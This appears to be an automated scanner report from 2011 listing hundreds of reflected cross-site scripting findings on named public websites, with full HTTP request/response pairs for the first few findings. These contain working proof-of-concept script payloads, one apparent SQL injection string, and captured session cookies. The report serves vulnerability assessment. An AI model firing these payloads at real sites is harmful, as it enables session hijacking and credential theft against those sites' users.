1.363. http://www.tucows.com/includes/js/xdocsize.js [REST URL parameter 1]

1.364. http://www.tucows.com/includes/js/xdocsize.js [REST URL parameter 2]

1.365. http://www.tucows.com/includes/js/xdocsize.js [REST URL parameter 3]

1.366. http://www.tucows.com/includes/js/yetii.js [REST URL parameter 1]

1.367. http://www.tucows.com/includes/js/yetii.js [REST URL parameter 2]

1.368. http://www.tucows.com/includes/js/yetii.js [REST URL parameter 3]

1.369. http://www.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 1]

1.370. http://www.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 2]

1.371. http://www.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 3]

1.372. http://www.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 4]

1.373. http://www.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 1]

1.374. http://www.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 2]

1.375. http://www.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 3]

1.376. http://www.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 4]

1.377. http://www.tucows.com/index.html [REST URL parameter 1]

1.378. http://www.tucows.com/index.html [name of an arbitrarily supplied request parameter]

1.379. http://www.tucows.com/preview/194850/x22 [REST URL parameter 1]

1.380. http://www.tucows.com/preview/194850/x22 [REST URL parameter 2]

1.381. http://www.tucows.com/preview/194850/x22 [REST URL parameter 3]

1.382. http://www.tucows.com/preview/194850/x22 [REST URL parameter 3]

1.383. http://www.tucows.com/preview/194850/x22 [name of an arbitrarily supplied request parameter]

1.384. http://www.tucows.com/privacy.html [REST URL parameter 1]

1.385. http://www.tucows.com/privacy.html [name of an arbitrarily supplied request parameter]

1.386. http://www.tucows.com/sitemap.html [REST URL parameter 1]

1.387. http://www.tucows.com/sitemap.html [name of an arbitrarily supplied request parameter]

1.388. http://www.tucows.com/software.html [REST URL parameter 1]

1.389. http://www.tucows.com/software.html [name of an arbitrarily supplied request parameter]

1.390. http://www.tucows.com/software.html [pf parameter]

1.391. http://www.tucows.com/software.html [t parameter]

1.392. http://www.tucows.com/terms.html [REST URL parameter 1]

1.393. http://www.tucows.com/terms.html [name of an arbitrarily supplied request parameter]

1.394. http://www.tucows.com/videoegg/ad.html [REST URL parameter 1]

1.395. http://www.tucows.com/videoegg/ad.html [REST URL parameter 2]

1.396. http://www.veoh.com/browse/videos/category/action_adventure [REST URL parameter 4]

1.397. http://www.veoh.com/browse/videos/category/action_adventure [REST URL parameter 4]

1.398. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE [REST URL parameter 4]

1.399. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE [REST URL parameter 4]

1.400. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE [REST URL parameter 6]

1.401. http://www.veoh.com/browse/videos/category/action_adventure/watch/v189741093prNNZM5 [REST URL parameter 4]

1.402. http://www.veoh.com/browse/videos/category/action_adventure/watch/v189741093prNNZM5 [REST URL parameter 4]

1.403. http://www.veoh.com/browse/videos/category/action_adventure/watch/v189741093prNNZM5 [REST URL parameter 6]

1.404. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8 [REST URL parameter 4]

1.405. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8 [REST URL parameter 4]

1.406. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8 [REST URL parameter 6]

1.407. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22 [REST URL parameter 4]

1.408. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22 [REST URL parameter 4]

1.409. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22 [REST URL parameter 6]

1.410. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp [REST URL parameter 4]

1.411. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp [REST URL parameter 4]

1.412. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp [REST URL parameter 6]

1.413. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207484775fTsGMdN [REST URL parameter 4]

1.414. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207484775fTsGMdN [REST URL parameter 4]

1.415. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207484775fTsGMdN [REST URL parameter 6]

1.416. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207490874eKBjfZC [REST URL parameter 4]

1.417. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207490874eKBjfZC [REST URL parameter 4]

1.418. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207490874eKBjfZC [REST URL parameter 6]

1.419. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20749145FCR2QekA [REST URL parameter 4]

1.420. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20749145FCR2QekA [REST URL parameter 4]

1.421. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20749145FCR2QekA [REST URL parameter 6]

1.422. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20753891TQ237Z7N [REST URL parameter 4]

1.423. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20753891TQ237Z7N [REST URL parameter 4]

1.424. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20753891TQ237Z7N [REST URL parameter 6]

1.425. http://www.veoh.com/browse/videos/category/action_adventure/watch/v2075425966g5b8E8 [REST URL parameter 4]

1.426. http://www.veoh.com/browse/videos/category/action_adventure/watch/v2075425966g5b8E8 [REST URL parameter 4]

1.427. http://www.veoh.com/browse/videos/category/action_adventure/watch/v2075425966g5b8E8 [REST URL parameter 6]

1.428. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt [REST URL parameter 4]

1.429. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt [REST URL parameter 4]

1.430. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt [REST URL parameter 6]

1.431. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB [REST URL parameter 4]

1.432. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB [REST URL parameter 4]

1.433. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB [REST URL parameter 6]

1.434. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20757961gnh48zmS [REST URL parameter 4]

1.435. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20757961gnh48zmS [REST URL parameter 4]

1.436. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20757961gnh48zmS [REST URL parameter 6]

1.437. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20758438BTte3QQz [REST URL parameter 4]

1.438. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20758438BTte3QQz [REST URL parameter 4]

1.439. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20758438BTte3QQz [REST URL parameter 6]

1.440. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20759029Mf8YXNhr [REST URL parameter 6]

1.441. http://www.veoh.com/browse/videos/category/action_adventure4957f [REST URL parameter 4]

1.442. http://www.veoh.com/browse/videos/category/action_adventure4957f [REST URL parameter 4]

1.443. http://www.veoh.com/browse/videos/category/action_adventure4957f">b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('') [REST URL parameter 4]

1.444. http://www.veoh.com/browse/videos/category/action_adventure4957f">b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('') [REST URL parameter 4]

1.445. http://www.veoh.com/browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/a [REST URL parameter 4]

1.446. http://www.veoh.com/browse/videos/category/animation/watch/v20767083WdnCj7gW [REST URL parameter 4]

1.447. http://www.veoh.com/browse/videos/category/animation/watch/v20767083WdnCj7gW [REST URL parameter 4]

1.448. http://www.veoh.com/browse/videos/category/animation/watch/v20767083WdnCj7gW [REST URL parameter 6]

1.449. http://www.veoh.com/browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T [REST URL parameter 4]

1.450. http://www.veoh.com/browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T [REST URL parameter 4]

1.451. http://www.veoh.com/browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T [REST URL parameter 6]

1.452. http://www.veoh.com/browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ [REST URL parameter 4]

1.453. http://www.veoh.com/browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ [REST URL parameter 4]

1.454. http://www.veoh.com/browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ [REST URL parameter 6]

1.455. http://www.veoh.com/browse/videos/category/entertainment/watch/v20767324YkGXZzfQ [REST URL parameter 4]

1.456. http://www.veoh.com/browse/videos/category/entertainment/watch/v20767324YkGXZzfQ [REST URL parameter 4]

1.457. http://www.veoh.com/browse/videos/category/entertainment/watch/v20767324YkGXZzfQ [REST URL parameter 6]

1.458. http://www.veoh.com/browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP [REST URL parameter 4]

1.459. http://www.veoh.com/browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP [REST URL parameter 4]

1.460. http://www.veoh.com/browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP [REST URL parameter 6]

1.461. http://www.veoh.com/category/list/tab/groups [REST URL parameter 4]

1.462. http://www.veoh.com/category/list/tab/home [REST URL parameter 4]

1.463. http://www.veoh.com/category/list/tab/movies [REST URL parameter 4]

1.464. http://www.veoh.com/category/list/tab/music [REST URL parameter 4]

1.465. http://www.veoh.com/category/list/tab/tvshows [REST URL parameter 4]

1.466. http://www.veoh.com/category/list/tab/videos [REST URL parameter 4]

1.467. http://www.veoh.com/category/list/tab/webseries [REST URL parameter 4]

1.468. http://www.veoh.com/download/index/permalinkId/v18978294NGnK88j8 [REST URL parameter 4]

1.469. http://www.veoh.com/search/videos/q/-MENUVALUE- [REST URL parameter 4]

1.470. http://www.veoh.com/search/videos/q/-MENUVALUE- [REST URL parameter 4]

1.471. http://www.veoh.com/search/videos/q/publisher:bunny12344 [REST URL parameter 4]

1.472. http://www.veoh.com/search/videos/q/publisher:bunny12344 [REST URL parameter 4]

1.473. http://www.veoh.com/video/flag/permalinkId/v18978294NGnK88j8 [REST URL parameter 4]

1.474. http://www.veoh.com/video/share/permalinkId/v18978294NGnK88j8 [REST URL parameter 4]

1.475. http://solutions.liveperson.com/ref/lppb.asp [Referer HTTP header]

1.476. http://www.quantcast.com/p-aasG6JkxVvmNA [Referer HTTP header]

1.477. http://www.supermedia.com/community/blog [Referer HTTP header]

1.478. http://www.supermedia.com/crossdomain.xml [Referer HTTP header]

1.479. http://www.supermedia.com/spportal/404.jsp [Referer HTTP header]

1.480. http://www.supermedia.com/spportal/img-spportal/supermedia/background/bkg_left_col_top_shadow_top.gif [Referer HTTP header]

1.481. http://www.supermedia.com/support/help/ [Referer HTTP header]

1.482. http://www.supermedia.com/yellow-pages/ [Referer HTTP header]

1.483. https://www.supermedia.com/ [Referer HTTP header]

1.484. https://www.supermedia.com/signin [Referer HTTP header]

1.485. https://www.supermedia.com/spportal/ [Referer HTTP header]

1.486. https://www.supermedia.com/spportal/404.jsp [Referer HTTP header]

1.487. https://www.supermedia.com/spportal/img-spportal/supermedia/background/bkg_left_col_top_shadow_top.gif [Referer HTTP header]

1.488. https://www.supermedia.com/spportal/login.do [Referer HTTP header]

1.489. https://www.supermedia.com/spportal/myaccount.do [Referer HTTP header]

1.490. https://www.supermedia.com/spportal/spportalFlow [Referer HTTP header]

1.491. https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header]

1.492. https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header]

1.493. https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header]

1.494. https://www.supermedia.com/spportal/spportalFlow.do(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C' [Referer HTTP header]

1.495. http://www.veoh.com/video/flag/permalinkId/v18978294NGnK88j8 [User-Agent HTTP header]

1.496. http://shop.aol.ca/store/list.adp [name of an arbitrarily supplied request parameter]



1. Cross-site scripting (reflected)
There are 496 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://abc.go.com/vp2/d/deeplink [REST URL parameter 3]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://abc.go.com
Path:   /vp2/d/deeplink

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload bf5ec--><script>alert(1)</script>db1ccd44039 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /vp2/d/deeplinkbf5ec--><script>alert(1)</script>db1ccd44039 HTTP/1.1
Host: abc.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.9
Content-Length: 4911
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error - 404 </title>
...[SNIP]...
<!-- ~#~#VP2#~#~ Version: 6.0.3.7 ~~~ Brandid: 001 ~~~ /vp2/d/deeplinkbf5ec--><script>alert(1)</script>db1ccd44039?brandid=001 -->
...[SNIP]...

1.2. http://ads.adap.tv/beacons [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adap.tv
Path:   /beacons

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload b6987<script>alert(1)</script>1178017b98e was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacons?callback=jsonp1296766389465b6987<script>alert(1)</script>1178017b98e HTTP/1.1
Host: ads.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: creativeViews="{\"v\":1,\"views\":[{\"id\":2840,\"ts\":1296135287,\"cts\":null}]}"; rtbData0="key=tidaltv:value=56bdd173-7d00-46e9-8ce1-554488db4bb8:expiresAt=Mon+Mar+28+06%3A24%3A48+PDT+2011:32-Compatible=true,key=testbuyer2451:value=wwqd12345:expiresAt=Thu+Jan+27+11%3A14%3A25+PST+2011:32-Compatible=true"; unique_ad_source_impression="11427%2C14970%2C8641%2C11573%2C14265__TIME__2011-01-27+05%3A24%3A55"; asptvw1="as7037%2C2%2C2011-01-27%2F12-09-46+ap1894%2C1%2C2011-01-27%2F12-09-31"; adsrcvw1="15517%2C2%2C2011-01-28%2F11-09-46"; marketTransaction="true__TIME__2011-01-27+11%3A09%3A45"; adaptv_unique_user_cookie="4260041098738838008__TIME__2011-02-03+06%3A17%3A46"; audienceData="{\"v\":2,\"providers\":{\"2\":{\"f\":1298707200,\"e\":1298707200,\"s\":[292,293],\"a\":[]},\"10\":{\"f\":1299312000,\"e\":1299312000,\"s\":[],\"a\":[]},\"13\":{\"f\":1298707200,\"e\":1298707200,\"s\":[524],\"a\":[]},\"14\":{\"f\":1298707200,\"e\":1298707200,\"s\":[],\"a\":[{\"val\":\"000\",\"id\":5}]}}}"

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="4260041098738838008__TIME__2011-02-03+13%3A39%3A06";Path=/;Domain=.adap.tv;Expires=Sun, 12-Oct-42 23:25:46 GMT
Content-Type: text/plain; charset=iso-8859-1
Server: Jetty(6.1.22)
Content-Length: 170

jsonp1296766389465b6987<script>alert(1)</script>1178017b98e({
   "beacons":["http://tags.bluekai.com/site/2174", "http://pixel.quantserve.com/pixel/p-c9d_b-0iR8pjg.gif"]
})

1.3. http://ads.gmodules.com/gadgets/ifr [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.gmodules.com
Path:   /gadgets/ifr

Issue detail

The value of the url request parameter is copied into a JavaScript rest-of-line comment. The payload 6f421%0aalert(1)//3a48dc45b10 was submitted in the url parameter. This input was echoed as 6f421
alert(1)//3a48dc45b10
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gadgets/ifr?synd=ads&url=http%3A%2F%2Fwww.ljmsite.com%2Fgoogle%2Fgadgetads%2Fkayakhotel%2F728x90.xml6f421%0aalert(1)//3a48dc45b10&lang=en&country=US&up_clickurl=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBuG1yFmZLTcWQPMbjlQe2s9g5trWeyQG615CeEcCNtwHQllEQARgBIMDIgxo4AFCb29C6AWDJvrKJkKTQEaABxJH67gOyAQ53d3cuYml6ZmluZC51c7oBCTcyOHg5MF9hc8gBCdoBXWh0dHA6Ly93d3cuYml6ZmluZC51cy8xNS8xODIyMjEvYWJjLWRldmVsb3BtZW50LWluYy9jaGljYWdvLmFzcHgveDIyLyUyMm5zPSUyMmFsZXJ0KDB4MDAwNkMxKeABA7gCGMgC5qXPF6gDAdEDCGK0Eaa7ijn1AwAAAMQ%26num%3D1%26ggladgrp%3D9764709784055921816%26gglcreat%3D9143352621951917205%26sig%3DAGiWqtwyJ0z2eP12NfR0KoaagOUkxWNa_A%26client%3Dca-pub-3033999741136561%26adurl%3D&up_aiturl=http://googleads.g.doubleclick.net/pagead/conversion/%3Fai%3DBuG1yFmZLTcWQPMbjlQe2s9g5trWeyQG615CeEcCNtwHQllEQARgBIMDIgxo4AFCb29C6AWDJvrKJkKTQEaABxJH67gOyAQ53d3cuYml6ZmluZC51c7oBCTcyOHg5MF9hc8gBCdoBXWh0dHA6Ly93d3cuYml6ZmluZC51cy8xNS8xODIyMjEvYWJjLWRldmVsb3BtZW50LWluYy9jaGljYWdvLmFzcHgveDIyLyUyMm5zPSUyMmFsZXJ0KDB4MDAwNkMxKeABA7gCGMgC5qXPF6gDAdEDCGK0Eaa7ijn1AwAAAMQ%26sigh%3DG7T3ZBT9Zc4%26label%3D_AITNAME_%26value%3D_AITVALUE_&up_ads_clicktarget_new_=0&up_rawquery=chicago%20hotels&up_city=Crystal&up_region=US-MI&up_lat=43.26&up_long=-84.91 HTTP/1.1
Host: ads.gmodules.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3033999741136561&output=html&h=90&slotname=2791779905&w=728&lmt=1296808620&flash=10.1.103&url=http%3A%2F%2Fwww.bizfind.us%2F15%2F182221%2Fabc-development-inc%2Fchicago.aspx%2Fx22%2F%2522ns%3D%2522alert(0x0006C1)&dt=1296787020952&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=7707606529%2C2067036752&correlator=1296787019866&frm=0&adk=1244530545&ga_vid=371918977.1296786866&ga_sid=1296786866&ga_hid=969342198&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1033&bih=1012&fu=0&ifi=3&dtd=11&xpc=WZvbsEpZ0D&p=http%3A//www.bizfind.us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Date: Fri, 04 Feb 2011 17:55:01 GMT
Expires: Fri, 04 Feb 2011 17:55:01 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 132

Unable to retrieve spec for http://www.ljmsite.com/google/gadgetads/kayakhotel/728x90.xml6f421
alert(1)//3a48dc45b10
. HTTP error 400

1.4. http://advertise.tucows.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41f20"-alert(1)-"c17f4a73141 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?41f20"-alert(1)-"c17f4a73141=1 HTTP/1.1
Host: advertise.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:03:33 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84492

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Software and Sh
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/?41f20"-alert(1)-"c17f4a73141=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.5. http://advertise.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25a76"-alert(1)-"4bef7d4836e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes25a76"-alert(1)-"4bef7d4836e/corpbar/cb3.0/css/style.css HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:21 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32339

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes25a76"-alert(1)-"4bef7d4836e/corpbar/cb3.0/css/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.6. http://advertise.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9378"-alert(1)-"68cf811d6fc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/corpbarb9378"-alert(1)-"68cf811d6fc/cb3.0/css/style.css HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
